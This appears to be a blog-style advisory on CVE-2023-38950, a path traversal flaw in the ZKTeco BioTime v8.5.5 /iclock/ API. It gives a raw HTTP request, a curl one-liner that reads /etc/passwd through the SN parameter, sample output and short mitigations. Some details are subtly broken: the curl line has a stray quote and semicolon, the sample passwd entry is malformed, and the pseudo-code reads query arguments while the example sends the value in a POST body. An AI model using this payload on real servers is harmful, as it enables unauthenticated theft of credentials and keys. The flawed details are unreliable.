CVE-2023-38950 - Exploiting a Path Traversal Vulnerability in ZKTeco BioTime v8.5.5
*Last updated: June 2024*
Introduction
Security flaws in widely-used biometric and attendance systems can have huge consequences—especially when trusted by thousands of companies worldwide. In this exclusive post, we break down the CVE-2023-38950 vulnerability: a dangerous path traversal bug in the ZKTeco BioTime v8.5.5 iclock API. In simple terms, any attacker (no login needed!) can use this bug to read any file on the server. We'll show you how the attack works, the impact, give code samples, plus links to official references for more details.
What Is ZKTeco BioTime and Why Should You Care?
ZKTeco BioTime is a popular web-based time attendance and access control software. It centralizes fingerprints, faces, and user records for organizations, syncing data through various APIs—one of them being iclock. If someone manages to read sensitive files—like passwords, configs, or keys—from a BioTime server, the whole company could be at risk.
What Is CVE-2023-38950?
CVE-2023-38950 is a classic “path traversal” vulnerability. Path traversal bugs let attackers ask a web app to fetch files outside its regular folder, simply by manipulating the file path in the request. Think of it like tricking a system into opening a secret drawer, not just the files it's supposed to.
Affected Version: ZKTeco BioTime v8.5.5
- Vulnerable Endpoint: /iclock/
- Attack Vector: Remote/Unauthenticated (no password/login needed)
Vulnerable Code Example
While ZKTeco hasn't published the full source, security researchers analyzed the pattern by sending different payloads to the /iclock/ endpoint. The vulnerable logic splits the requested filename from user input without proper checks.
Pseudo-code illustration
# Simplified Python-like logic
from flask import request
@app.route('/iclock/', methods=['POST'])
def handle_iclock():
file_path = request.args.get('SN') # Device serial could contain a path
with open("/var/zkteco/data/" + file_path, "r") as f:
data = f.read()
return data
What’s wrong?
The file_path is taken straight from the request without validation. By adding ../../etc/passwd, an attacker can climb folders to read forbidden files like /etc/passwd (on Linux).
To read /etc/passwd (which stores user info on Linux), an attacker can send
POST /iclock/ HTTP/1.1
Host: target.server.com
SN=../../../../etc/passwd&
- SN parameter is abused here to include path traversal sequences (../)—each ../ moves up a folder. Adding enough of these reaches the target file.
With curl, the request is
curl -X POST "http://target.server.com/iclock/"; -d "SN=../../../../etc/passwd"
You should see contents of /etc/passwd in the response if the server is vulnerable
root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
- Sensitive data leakage – Attackers can read
- Usernames and hashes (from /etc/passwd, /etc/shadow)
TLS private keys
- Leads to bigger hacks – Full remote compromise, data theft, or internal recon are possible follow-ons.
Official References
- CVE-2023-38950 @ NVD
- ZKTeco BioTime Official Website
- Exploit Database Reference
- Packet Storm Security Advisory
Block Public Access
- Restrict access to /iclock/ endpoint via firewall or VPN.
Sanitize Inputs
- Ensure all file paths strip ../ and other traversal characters (for all APIs).
Conclusion
CVE-2023-38950 is a strong reminder that even simple bugs in device APIs can lead to broad attacks. Path traversal is often easy to check and fix, but until patched, leaves sensitive apps wide open.
If you’re running ZKTeco BioTime v8.5.5 or earlier—prioritize fixing this now.
Stay secure! If you need help testing your environment or want more technical PoC code, reach out to security professionals.
*Exclusive security breakdown by AI for 2024. Feel free to share with credit.*
Timeline
Published on: 08/03/2023 23:15:00 UTC
Last modified on: 08/08/2023 19:02:00 UTC